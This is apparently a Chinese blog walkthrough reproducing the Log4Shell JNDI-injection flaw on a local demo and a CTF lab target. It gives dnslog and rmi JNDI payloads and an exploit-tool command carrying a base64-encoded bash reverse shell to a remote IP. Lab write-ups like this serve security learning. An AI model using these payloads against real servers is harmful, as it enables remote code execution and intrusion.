Log4j靶机本地复现+VPS公网反弹shell复现
Log4j靶机本地复现+VPS公网反弹shell复现
LOG4J被称为核弹级漏洞
Log4Shell漏洞可导致在运行易受攻击的应用程序的底层服务器上远程执行代码,利用该问题无须身份验证。
LOG4J存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码
我们可以先本地进行复现
开启ldap服务,监听1389端口,然后利用LOG4JRCE触发弹出计算器的命令
然后是VPS反弹SHELL远程复现
工具下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases
这里需要准备一台VPS服务器
以及开启LDAP
VPS需要JDK环境
确认能正常使用java -version
javac -version
先进行验证漏洞
打开靶机环境
http://432e8732-215c-4edf-9811-4fc742533d89.challenge.ctf.show/
我们使用dnslog.cn进行验证
然后构造payload
payload=${jndi:ldap://qwr2me.dnslog.cn/exp}
点击提交
证明存在漏洞
我们接下来使用VPS进行反弹
首先需要准备JNDI-Injection-Exploit-1.0-SNAPSHOT-all工具
然后在VPS开启
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjEwLjE2My85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A "服务器IP"
我们首先需要进行转码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjEwLjE2My85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}
转码的是服务器IP以及要监听的端口
然后VPS执行
然后VPS还需要进行监听
接下来输入构造的payload
payload=${jndi:rmi://VPS:1099/hxqfhj}
点击提交
成功获取到cmdshell
但是在工作中遇到过log4j的站点,客户一般情况下都修复了
======================================================================
<< 上一篇
下一篇 >>